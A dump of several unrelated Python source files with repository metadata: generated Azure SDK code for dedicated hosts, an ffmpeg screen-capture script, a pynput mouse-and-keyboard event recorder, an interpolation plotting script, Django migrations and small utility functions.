content-type. Content type parameter for binary body. Default value is "application/json". :paramtype content_type: str :keyword callable cls: A custom type or function that will be passed the direct response :keyword str continuation_token: A continuation token to restart a poller from a saved state. :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy. :paramtype polling: bool or ~azure.core.polling.PollingMethod :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present. 
:return: An instance of LROPoller that returns either DedicatedHost or the result of cls(response) :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.compute.v2021_03_01.models.DedicatedHost] :raises ~azure.core.exceptions.HttpResponseError: """ @distributed_trace def begin_create_or_update( self, resource_group_name: str, host_group_name: str, host_name: str, parameters: Union[_models.DedicatedHost, IO], **kwargs: Any ) -> LROPoller[_models.DedicatedHost]: """Create or update a dedicated host . :param resource_group_name: The name of the resource group. Required. :type resource_group_name: str :param host_group_name: The name of the dedicated host group. Required. :type host_group_name: str :param host_name: The name of the dedicated host . Required. :type host_name: str :param parameters: Parameters supplied to the Create Dedicated Host. Is either a model type or a IO type. Required. :type parameters: ~azure.mgmt.compute.v2021_03_01.models.DedicatedHost or IO :keyword content_type: Body Parameter content-type. Known values are: 'application/json'. Default value is None. :paramtype content_type: str :keyword callable cls: A custom type or function that will be passed the direct response :keyword str continuation_token: A continuation token to restart a poller from a saved state. :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy. :paramtype polling: bool or ~azure.core.polling.PollingMethod :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present. 
:return: An instance of LROPoller that returns either DedicatedHost or the result of cls(response) :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.compute.v2021_03_01.models.DedicatedHost] :raises ~azure.core.exceptions.HttpResponseError: """ _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {}) _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-03-01")) # type: str content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str] cls = kwargs.pop("cls", None) # type: ClsType[_models.DedicatedHost] polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod] lro_delay = kwargs.pop("polling_interval", self._config.polling_interval) cont_token = kwargs.pop("continuation_token", None) # type: Optional[str] if cont_token is None: raw_result = self._create_or_update_initial( # type: ignore resource_group_name=resource_group_name, host_group_name=host_group_name, host_name=host_name, parameters=parameters, api_version=api_version, content_type=content_type, cls=lambda x, y, z: x, headers=_headers, params=_params, **kwargs ) kwargs.pop("error_map", None) def get_long_running_output(pipeline_response): deserialized = self._deserialize("DedicatedHost", pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized if polling is True: polling_method = cast(PollingMethod, ARMPolling(lro_delay, **kwargs)) # type: PollingMethod elif polling is False: polling_method = cast(PollingMethod, NoPolling()) else: polling_method = polling if cont_token: return LROPoller.from_continuation_token( polling_method=polling_method, continuation_token=cont_token, client=self._client, deserialization_callback=get_long_running_output, ) return LROPoller(self._client, raw_result, get_long_running_output, polling_method) begin_create_or_update.metadata = {"url": 
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}/hosts/{hostName}"} # type: ignore def _update_initial( self, resource_group_name: str, host_group_name: str, host_name: str, parameters: Union[_models.DedicatedHostUpdate, IO], **kwargs: Any ) -> _models.DedicatedHost: error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError, 304: ResourceNotModifiedError, } error_map.update(kwargs.pop("error_map", {}) or {}) _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {}) _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-03-01")) # type: str content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str] cls = kwargs.pop("cls", None) # type: ClsType[_models.DedicatedHost] content_type = content_type or "application/json" _json = None _content = None if isinstance(parameters, (IO, bytes)): _content = parameters else: _json = self._serialize.body(parameters, "DedicatedHostUpdate") request = build_update_request( resource_group_name=resource_group_name, host_group_name=host_group_name, host_name=host_name, subscription_id=self._config.subscription_id, api_version=api_version, content_type=content_type, json=_json, content=_content, template_url=self._update_initial.metadata["url"], headers=_headers, params=_params, ) request = _convert_request(request) request.url = self._client.format_url(request.url) # type: ignore pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access request, stream=False, **kwargs ) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response, error_format=ARMErrorFormat) deserialized = self._deserialize("DedicatedHost", 
pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized _update_initial.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}/hosts/{hostName}"} # type: ignore @overload def begin_update( self, resource_group_name: str, host_group_name: str, host_name: str, parameters: _models.DedicatedHostUpdate, *, content_type: str = "application/json", **kwargs: Any ) -> LROPoller[_models.DedicatedHost]: """Update an dedicated host . :param resource_group_name: The name of the resource group. Required. :type resource_group_name: str :param host_group_name: The name of the dedicated host group. Required. :type host_group_name: str :param host_name: The name of the dedicated host . Required. :type host_name: str :param parameters: Parameters supplied to the Update Dedicated Host operation. Required. :type parameters: ~azure.mgmt.compute.v2021_03_01.models.DedicatedHostUpdate :keyword content_type: Body Parameter content-type. Content type parameter for JSON body. Default value is "application/json". :paramtype content_type: str :keyword callable cls: A custom type or function that will be passed the direct response :keyword str continuation_token: A continuation token to restart a poller from a saved state. :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy. :paramtype polling: bool or ~azure.core.polling.PollingMethod :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present. 
:return: An instance of LROPoller that returns either DedicatedHost or the result of cls(response) :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.compute.v2021_03_01.models.DedicatedHost] :raises ~azure.core.exceptions.HttpResponseError: """ @overload def begin_update( self, resource_group_name: str, host_group_name: str, host_name: str, parameters: IO, *, content_type: str = "application/json", **kwargs: Any ) -> LROPoller[_models.DedicatedHost]: """Update an dedicated host . :param resource_group_name: The name of the resource group. Required. :type resource_group_name: str :param host_group_name: The name of the dedicated host group. Required. :type host_group_name: str :param host_name: The name of the dedicated host . Required. :type host_name: str :param parameters: Parameters supplied to the Update Dedicated Host operation. Required. :type parameters: IO :keyword content_type: Body Parameter content-type. Content type parameter for binary body. Default value is "application/json". :paramtype content_type: str :keyword callable cls: A custom type or function that will be passed the direct response :keyword str continuation_token: A continuation token to restart a poller from a saved state. :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy. :paramtype polling: bool or ~azure.core.polling.PollingMethod :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present. 
:return: An instance of LROPoller that returns either DedicatedHost or the result of cls(response) :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.compute.v2021_03_01.models.DedicatedHost] :raises ~azure.core.exceptions.HttpResponseError: """ @distributed_trace def begin_update( self, resource_group_name: str, host_group_name: str, host_name: str, parameters: Union[_models.DedicatedHostUpdate, IO], **kwargs: Any ) -> LROPoller[_models.DedicatedHost]: """Update an dedicated host . :param resource_group_name: The name of the resource group. Required. :type resource_group_name: str :param host_group_name: The name of the dedicated host group. Required. :type host_group_name: str :param host_name: The name of the dedicated host . Required. :type host_name: str :param parameters: Parameters supplied to the Update Dedicated Host operation. Is either a model type or a IO type. Required. :type parameters: ~azure.mgmt.compute.v2021_03_01.models.DedicatedHostUpdate or IO :keyword content_type: Body Parameter content-type. Known values are: 'application/json'. Default value is None. :paramtype content_type: str :keyword callable cls: A custom type or function that will be passed the direct response :keyword str continuation_token: A continuation token to restart a poller from a saved state. :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy. :paramtype polling: bool or ~azure.core.polling.PollingMethod :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present. 
:return: An instance of LROPoller that returns either DedicatedHost or the result of cls(response) :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.compute.v2021_03_01.models.DedicatedHost] :raises ~azure.core.exceptions.HttpResponseError: """ _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {}) _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-03-01")) # type: str content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str] cls = kwargs.pop("cls", None) # type: ClsType[_models.DedicatedHost] polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod] lro_delay = kwargs.pop("polling_interval", self._config.polling_interval) cont_token = kwargs.pop("continuation_token", None) # type: Optional[str] if cont_token is None: raw_result = self._update_initial( # type: ignore resource_group_name=resource_group_name, host_group_name=host_group_name, host_name=host_name, parameters=parameters, api_version=api_version, content_type=content_type, cls=lambda x, y, z: x, headers=_headers, params=_params, **kwargs ) kwargs.pop("error_map", None) def get_long_running_output(pipeline_response): deserialized = self._deserialize("DedicatedHost", pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized if polling is True: polling_method = cast(PollingMethod, ARMPolling(lro_delay, **kwargs)) # type: PollingMethod elif polling is False: polling_method = cast(PollingMethod, NoPolling()) else: polling_method = polling if cont_token: return LROPoller.from_continuation_token( polling_method=polling_method, continuation_token=cont_token, client=self._client, deserialization_callback=get_long_running_output, ) return LROPoller(self._client, raw_result, get_long_running_output, polling_method) begin_update.metadata = {"url": 
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}/hosts/{hostName}"} # type: ignore def _delete_initial( # pylint: disable=inconsistent-return-statements self, resource_group_name: str, host_group_name: str, host_name: str, **kwargs: Any ) -> None: error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError, 304: ResourceNotModifiedError, } error_map.update(kwargs.pop("error_map", {}) or {}) _headers = kwargs.pop("headers", {}) or {} _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-03-01")) # type: str cls = kwargs.pop("cls", None) # type: ClsType[None] request = build_delete_request( resource_group_name=resource_group_name, host_group_name=host_group_name, host_name=host_name, subscription_id=self._config.subscription_id, api_version=api_version, template_url=self._delete_initial.metadata["url"], headers=_headers, params=_params, ) request = _convert_request(request) request.url = self._client.format_url(request.url) # type: ignore pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access request, stream=False, **kwargs ) response = pipeline_response.http_response if response.status_code not in [200, 202, 204]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response, error_format=ARMErrorFormat) if cls: return cls(pipeline_response, None, {}) _delete_initial.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}/hosts/{hostName}"} # type: ignore @distributed_trace def begin_delete( self, resource_group_name: str, host_group_name: str, host_name: str, **kwargs: Any ) -> LROPoller[None]: """Delete a dedicated host. :param resource_group_name: The name of the resource group. 
Required. :type resource_group_name: str :param host_group_name: The name of the dedicated host group. Required. :type host_group_name: str :param host_name: The name of the dedicated host. Required. :type host_name: str :keyword callable cls: A custom type or function that will be passed the direct response :keyword str continuation_token: A continuation token to restart a poller from a saved state. :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy. :paramtype polling: bool or ~azure.core.polling.PollingMethod :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present. :return: An instance of LROPoller that returns either None or the result of cls(response) :rtype: ~azure.core.polling.LROPoller[None] :raises ~azure.core.exceptions.HttpResponseError: """ _headers = kwargs.pop("headers", {}) or {} _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-03-01")) # type: str cls = kwargs.pop("cls", None) # type: ClsType[None] polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod] lro_delay = kwargs.pop("polling_interval", self._config.polling_interval) cont_token = kwargs.pop("continuation_token", None) # type: Optional[str] if cont_token is None: raw_result = self._delete_initial( # type: ignore resource_group_name=resource_group_name, host_group_name=host_group_name, host_name=host_name, api_version=api_version, cls=lambda x, y, z: x, headers=_headers, params=_params, **kwargs ) kwargs.pop("error_map", None) def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements if cls: return cls(pipeline_response, None, {}) if polling is True: polling_method = cast(PollingMethod, ARMPolling(lro_delay, **kwargs)) # type: PollingMethod 
elif polling is False: polling_method = cast(PollingMethod, NoPolling()) else: polling_method = polling if cont_token: return LROPoller.from_continuation_token( polling_method=polling_method, continuation_token=cont_token, client=self._client, deserialization_callback=get_long_running_output, ) return LROPoller(self._client, raw_result, get_long_running_output, polling_method) begin_delete.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}/hosts/{hostName}"} # type: ignore @distributed_trace def get( self, resource_group_name: str, host_group_name: str, host_name: str, expand: Optional[Union[str, "_models.InstanceViewTypes"]] = None, **kwargs: Any ) -> _models.DedicatedHost: """Retrieves information about a dedicated host. :param resource_group_name: The name of the resource group. Required. :type resource_group_name: str :param host_group_name: The name of the dedicated host group. Required. :type host_group_name: str :param host_name: The name of the dedicated host. Required. :type host_name: str :param expand: The expand expression to apply on the operation. 'InstanceView' will retrieve the list of instance views of the dedicated host. 'UserData' is not supported for dedicated host. Known values are: "instanceView" and "userData". Default value is None. 
:type expand: str or ~azure.mgmt.compute.v2021_03_01.models.InstanceViewTypes :keyword callable cls: A custom type or function that will be passed the direct response :return: DedicatedHost or the result of cls(response) :rtype: ~azure.mgmt.compute.v2021_03_01.models.DedicatedHost :raises ~azure.core.exceptions.HttpResponseError: """ error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError, 304: ResourceNotModifiedError, } error_map.update(kwargs.pop("error_map", {}) or {}) _headers = kwargs.pop("headers", {}) or {} _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-03-01")) # type: str cls = kwargs.pop("cls", None) # type: ClsType[_models.DedicatedHost] request = build_get_request( resource_group_name=resource_group_name, host_group_name=host_group_name, host_name=host_name, subscription_id=self._config.subscription_id, expand=expand, api_version=api_version, template_url=self.get.metadata["url"], headers=_headers, params=_params, ) request = _convert_request(request) request.url = self._client.format_url(request.url) # type: ignore pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access request, stream=False, **kwargs ) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response, error_format=ARMErrorFormat) deserialized = self._deserialize("DedicatedHost", pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized get.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}/hosts/{hostName}"} # type: ignore @distributed_trace def list_by_host_group( self, resource_group_name: str, host_group_name: str, **kwargs: Any ) -> 
Iterable["_models.DedicatedHost"]: """Lists all of the dedicated hosts in the specified dedicated host group. Use the nextLink property in the response to get the next page of dedicated hosts. :param resource_group_name: The name of the resource group. Required. :type resource_group_name: str :param host_group_name: The name of the dedicated host group. Required. :type host_group_name: str :keyword callable cls: A custom type or function that will be passed the direct response :return: An iterator like instance of either DedicatedHost or the result of cls(response) :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.compute.v2021_03_01.models.DedicatedHost] :raises ~azure.core.exceptions.HttpResponseError: """ _headers = kwargs.pop("headers", {}) or {} _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-03-01")) # type: str cls = kwargs.pop("cls", None) # type: ClsType[_models.DedicatedHostListResult] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError, 304: ResourceNotModifiedError, } error_map.update(kwargs.pop("error_map", {}) or {}) def prepare_request(next_link=None): if not next_link: request = build_list_by_host_group_request( resource_group_name=resource_group_name, host_group_name=host_group_name, subscription_id=self._config.subscription_id, api_version=api_version, template_url=self.list_by_host_group.metadata["url"], headers=_headers, params=_params, ) request = _convert_request(request) request.url = self._client.format_url(request.url) # type: ignore else: # make call to next link with the client's api-version _parsed_next_link = urlparse(next_link) _next_request_params = case_insensitive_dict(parse_qs(_parsed_next_link.query)) _next_request_params["api-version"] = self._config.api_version request = HttpRequest("GET", urljoin(next_link, _parsed_next_link.path), params=_next_request_params) request = _convert_request(request) 
request.url = self._client.format_url(request.url) # type: ignore request.method = "GET" return request def extract_data(pipeline_response): deserialized = self._deserialize("DedicatedHostListResult", pipeline_response) list_of_elem = deserialized.value if cls: list_of_elem = cls(list_of_elem) return deserialized.next_link or None, iter(list_of_elem) def get_next(next_link=None): request = prepare_request(next_link) pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access request, stream=False, **kwargs ) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response, error_format=ARMErrorFormat) return pipeline_response return ItemPaged(get_next, extract_data) list_by_host_group.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}/hosts"} # type: ignore
[ "noreply@github.com" ]
noreply@github.com
7bde798354f8a27458cd2bd430e193c4242bee55
554635c28263a16ae538887187e447e476e09aea
/Node.py
ce1933a2bedb237200b118369ba13e6a1b343484
[]
no_license
Horofic/AI
1264fae7401392b2deb885f74dbba8bbb31fbe6c
ecc812956aed4c1bfaa2d876a23bde446b2dbc5e
refs/heads/master
2021-08-19T21:46:14.047244
2017-11-27T13:40:25
2017-11-27T13:40:25
112,200,500
0
0
null
null
null
null
UTF-8
Python
false
false
351
py
from Link import Link


class Node:
    """A graph node whose value is the weighted sum of its upstream nodes."""

    def __init__(self, linkedNodes):
        # One incoming link (initial weight 1.0) from each upstream node.
        self.links = [Link(1.0, upstream, self) for upstream in linkedNodes]
        self.value = 0

    def calculate(self):
        """Recompute value from the current upstream values and link weights."""
        self.value = sum(link.start.value * link.weightFactor for link in self.links)
[ "ikweetnie123@hotmail.com" ]
ikweetnie123@hotmail.com
dd831f71086ba26f6e526a01c435b01b2c54ac27
7fc24b36564f348298acac77cf4900b2204be283
/scr_capture.py
e9ae16c23f21c4e041eb1d1eb93a3dea38226618
[]
no_license
shadow-identity/screen_capture
ee7e41a4b754b2de2c732f66205b86454f8c0c90
4e4c5c3b41dfa6e445a3f1bf8a4b78e7f4145a3b
refs/heads/master
2016-08-05T07:11:03.131181
2014-01-13T16:19:44
2014-01-13T16:19:44
12,612,290
1
0
null
null
null
null
UTF-8
Python
false
false
796
py
#!/bin/python
# -*- coding: utf_8 -*-
"""Record the X11 screen to a video file with ffmpeg (x11grab)."""
import subprocess
import sys

# Capture frame rate; change freely.
fps = 25

# Current screen resolution from xrandr, e.g. "1920x1080".
# check_output returns bytes on Python 3, so decode before formatting.
res = subprocess.check_output("xrandr | grep \\*", shell=True).split()[0].decode()

# ffmpeg command template. Fix: the {filename} placeholder was missing, so the
# output file name given on the command line was never passed to ffmpeg.
command = ("ffmpeg -f x11grab -r {fps} -s {resolution} -i :0.0 -vcodec libx264 "
           "-preset ultrafast -crf 0 -threads 0 {filename}")

if len(sys.argv) != 2:
    print("You must specify filename to save, for example:")
    print("{my_name} screencast.mkv".format(my_name=__file__))
    print("python {my_name} screencast.mkv".format(my_name=__file__))
    sys.exit(1)

# Exit with ffmpeg's own return code.
sys.exit(subprocess.call(command.format(resolution=res,
                                        filename=sys.argv[1],
                                        fps=fps),
                         shell=True))
[ "pavel.nedr@gmail.com" ]
pavel.nedr@gmail.com
c9c28327fb58a3aa98aeddba5412a1cc8b720423
6aa85c2b0cd13c5f1f7bd94a7901baa5c074565e
/PycharmProjects/TCGA_w_bed/1create_mutation_bed.py
328109e7dea956cc1c73602c8a22049e3d0f3790
[]
no_license
rrawat/TCGA_w_bed
204da76115acb6229dfc1dc39a1ceb847a06943c
d09043895a2092611a2d3cee68b6b83910999d7e
refs/heads/master
2021-01-09T20:57:35.884731
2016-07-07T15:43:46
2016-07-07T15:43:46
62,512,727
0
0
null
null
null
null
UTF-8
Python
false
false
1,213
py
# Gene name / Accession Number / ... column header description of the COSMIC
# export. Relevant tab-separated columns used below: [0] gene name,
# [1] accession number, [4] sample name, [22] GRCh build,
# [23] genome position as "chrom:start-end".
# Builds a BED file of GRCh38 breast-tissue mutation records.

# Fix: the "U" (universal-newline) open mode was removed in Python 3.11;
# plain text mode performs the same newline translation by default.
with open("/Users/radhikarawat/PycharmProjects/CosmicMutantExport.tsv", "r") as mutation_data_file:
    with open("mutation_bed.bed", "w") as f:
        for line in mutation_data_file:
            row = line.split("\t")
            # Keep only GRCh38 rows whose record mentions breast tissue.
            # NOTE(review): 'in row' tests for an exact field equal to
            # "breast" (any column) — confirm which column is intended.
            if row[22] == "38" and "breast" in row:
                mutchrom, bps = row[23].split(":")
                mutchrom = "chr" + mutchrom
                mutstart, mutend = bps.split("-")
                name = row[1]
                gene_name = row[0]
                TCGA_info = row[4]
                # BED line: chrom, start, end, accession, gene, sample.
                f.write("%s\t%s\t%s\t%s\t%s\t%s\n" %
                        (mutchrom, mutstart, mutend, name, gene_name, TCGA_info))
[ "rawat.radhika@gmail.com" ]
rawat.radhika@gmail.com
e66a3429fba0505d6bd22ffa8a883b2d373757e7
e06bd7bc83b9990702afb2bac9e1b8df4f7cc578
/record.py
8da7a9551aa1b98213dec677c74cc9941c0f0d83
[]
no_license
sohamlanke/Automation
7a4c649ad05edcae6afd0be9c33a2c1a52b296b1
2b00342ada47fdd61c334f9a2ca2ffcb7f7ac768
refs/heads/main
2023-07-17T16:30:15.872150
2021-08-16T16:44:49
2021-08-16T16:44:49
396,882,076
2
0
null
null
null
null
UTF-8
Python
false
false
1,298
py
from pynput import mouse
from pynput import keyboard
from pynput.keyboard import Key
import json
import sys
import time

# Log file that receives all recorded events as one JSON array on exit.
f = open("mouselogs.txt", "w")
# Recorded events (mouse clicks and key releases), in order of occurrence.
clicks = []
# Timestamps of the most recent mouse button press / release.
pressTime = 0
releaseTime = 0

def on_click(x,y,button,ispressed):
    # Mouse listener callback; invoked once on press and once on release.
    global pressTime, releaseTime
    isdoublepress = False
    if ispressed:
        pressTime = time.time()
    if not ispressed:
        releaseTime = time.time()
    if(ispressed == False):
        # NOTE(review): this compares press and release time of the SAME
        # click, so "double" really means "press held under 0.1 s" — confirm
        # the intended double-click semantics.
        diff = abs(pressTime - releaseTime)
        print(diff)
        if diff <= 0.1:
            isdoublepress = True
            print("double clicked")
    if(ispressed == False):
        # Record the release: duration flag is 0 for a quick ("double")
        # press, 1 otherwise.
        dict = {"mouse": True, "x": x, "y": y, "duration": 0 if isdoublepress else 1}
        clicks.append(dict)
        # print(clicks)

def on_release(keys):
    # Keyboard listener callback: records every released key until Esc.
    if keys != Key.esc:
        # NOTE(review): special keys (Shift, arrows, ...) have no .char and
        # would raise AttributeError here — confirm only printable keys occur.
        print('{0} release'.format(keys.char))
        print(type(keys.char))
        dict = {"mouse": False, "keypressed": keys.char}
        clicks.append(dict)
        print(clicks)
    if keys == Key.esc:
        # Esc ends the recording: dump the event list to the log and exit.
        print("Escape pressed, end string in file")
        f.write(json.dumps(clicks))
        f.close()
        sys.exit()

# Run both listeners until sys.exit() is raised from on_release.
with keyboard.Listener(on_release=on_release) as k_listener, mouse.Listener(on_click=on_click) as m_listener:
    k_listener.join()
    m_listener.join()
[ "sohamlanke@gmail.com" ]
sohamlanke@gmail.com
2f85952fcbe3b65f4c744f4e3bb7f9549a012652
cb4cfcece4bc14f591b038adbc7fadccaf447a1d
/ELEVSTRS.py
d84b11ce6e30ca754fe1115b5248d18d884db818
[]
no_license
psycho-pomp/CodeChef
ba88cc8e15b3e87d39ad0c4665c6892620c09d22
881edddded0bc8820d22f42b94b9959fd6912c88
refs/heads/master
2023-03-21T06:46:14.455055
2021-03-11T12:07:48
2021-03-11T12:07:48
275,214,989
3
0
null
null
null
null
UTF-8
Python
false
false
224
py
"""CodeChef ELEVSTRS: pick stairs or elevator, whichever is not slower."""
from math import sqrt

for _ in range(int(input())):
    n, v1, v2 = map(int, input().split())
    stairs_time = n / v1                  # straight run of length N at speed V1
    elevator_time = sqrt(2) * n / v2      # elevator path is sqrt(2)*N at speed V2
    # Ties go to the stairs, matching the original comparison t2 >= t1.
    print("Stairs" if elevator_time >= stairs_time else "Elevator")
[ "noreply@github.com" ]
noreply@github.com
dc30cb6c2b1ae28d96b3d07b74b0dd419ceb9c5b
34a2bad3033faba30cfa21d604291e5856020ee3
/polint/q7.py
72d0782862c0843707631d69f1ea58bc0a85eef0
[]
no_license
karnatyrohit/computer_methods_assignment
79b063935381b9e2406935fd8fbc1bbc7995ebed
bed9782f956c94f11ee37e47fbbc5cffad992436
refs/heads/master
2021-01-10T09:40:28.324788
2015-12-13T15:37:17
2015-12-13T15:37:17
47,776,469
0
0
null
null
null
null
UTF-8
Python
false
false
895
py
from scipy import *
from matplotlib.pyplot import *
from q1 import *

def f(x):
    # Test function sin(pi*x)/sqrt(1 - x^2); singular at |x| = 1, so all
    # sample points below stay inside (0, 1).
    y = zeros(x.shape)
    y = sin((pi) * x) / sqrt(1-x*x)
    return y

# 17 interpolation nodes on [0.1, 0.9].
x = linspace(0.1,0.9,17)
#y = [f(x1) for x1 in x]
y = f(x)
figure(3)
plot(x, y)

# Worst-case actual / estimated interpolation error, indexed by order n.
max_exact=zeros(21)
max_est=zeros(21)
#n=3 # order of interpolation
#xarr=linspace(0,1,30)
#yarr=sin(xarr+xarr*xarr);
#t=linspace(0,pi,111)
for n in range(5,16):
    # Evaluate the nth-order interpolant on a fine grid over the same interval.
    delta = 0
    xx=linspace(0.1- delta,0.9 + delta,1000)
    #xx=array([-pi])
    # polint comes from q1; by use below it returns (values, error estimate).
    z=polint(x,y,xx,n)
    yy=z[0];dyy=z[1]
    y0=f(xx)
    # Interpolant (red dots) vs. exact function (black).
    figure(0)
    plot(xx,yy,'ro',xx,y0,'k')
    title("Interpolation by %dth order polynomial" % n)
    # Actual error vs. polint's own error estimate, log scale.
    figure(1)
    semilogy(xx,abs(yy-y0),'ro',xx,abs(dyy),'k')
    title("Error in interpolation")
    legend(["Actual error","Error Est"])
    max_est[n]=amax(abs(dyy))
    max_exact[n]=amax(abs(yy-y0))
    # Track how the worst-case errors scale with interpolation order.
    figure("err")
    semilogy(n,max_exact[n],'ro',n,max_est[n],'bo')
    legend(["Actual error","Error Est"])
show()
[ "karnaty.rohit@gmail.com" ]
karnaty.rohit@gmail.com
57ed8dfd72a02f6d165108493f9b836bd6aaa42f
e019891f24aa7ad9494a74b58cd6ab3ec04e9053
/archive/migrations/0010_auto_20170609_1109.py
7e6c06a873009d62e7125b560bee0a2a1e6b2464
[]
no_license
MicrobesNG/StrainArchive
b34ede9779148ea9e87efcfb2025a9088ed81fcc
789ea7a13ad94c80f79c1c203a1a27945fccb57e
refs/heads/master
2020-07-15T04:58:23.400489
2017-07-17T14:22:00
2017-07-17T14:22:00
94,303,287
0
0
null
null
null
null
UTF-8
Python
false
false
615
py
# -*- coding: utf-8 -*- # Generated by Django 1.11.2 on 2017-06-09 11:09 from __future__ import unicode_literals from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('archive', '0009_auto_20170609_1045'), ] operations = [ migrations.AlterField( model_name='strain', name='uploader', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='uploader', to=settings.AUTH_USER_MODEL), ), ]
[ "microbesng@bio1187.bham.ac.uk" ]
microbesng@bio1187.bham.ac.uk
a81f1658dd871e8e403dcf6b4e512ae458767a2f
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
/HBKAGJZ62JkCTgYX3_15.py
5c5665b4393c00c704f2eb04cb3ee08dfe0d3464
[]
no_license
daniel-reich/ubiquitous-fiesta
26e80f0082f8589e51d359ce7953117a3da7d38c
9af2700dbe59284f5697e612491499841a6c126f
refs/heads/master
2023-04-05T06:40:37.328213
2021-04-06T20:17:44
2021-04-06T20:17:44
355,318,759
0
0
null
null
null
null
UTF-8
Python
false
false
130
py
def last(l, n):
    """Return the final n elements of l.

    Returns [] when n is 0, and the string 'invalid' when n exceeds len(l).
    """
    if n > len(l):
        return 'invalid'
    if n == 0:
        return []
    return l[-n:]
[ "daniel.reich@danielreichs-MacBook-Pro.local" ]
daniel.reich@danielreichs-MacBook-Pro.local
0a53f26329b7e8f590b399d677a12e83e6704b2e
28a124b6a2f22a53af3b6bb754e77af88b4138e1
/DJANGO/companytodo/reports/migrations/0006_auto_20191209_0121.py
a29feb60b3e3cadd0f868274c2f14a8a99ef6f0e
[]
no_license
mebaysan/LearningKitforBeginners-Python
f7c6668a9978b52cad6cc2b969990d7bbfedc376
9e1a47fb14b3d81c5b009b74432902090e213085
refs/heads/master
2022-12-21T03:12:19.892857
2021-06-22T11:58:27
2021-06-22T11:58:27
173,840,726
18
4
null
2022-12-10T03:00:22
2019-03-04T23:56:27
Python
UTF-8
Python
false
false
350
py
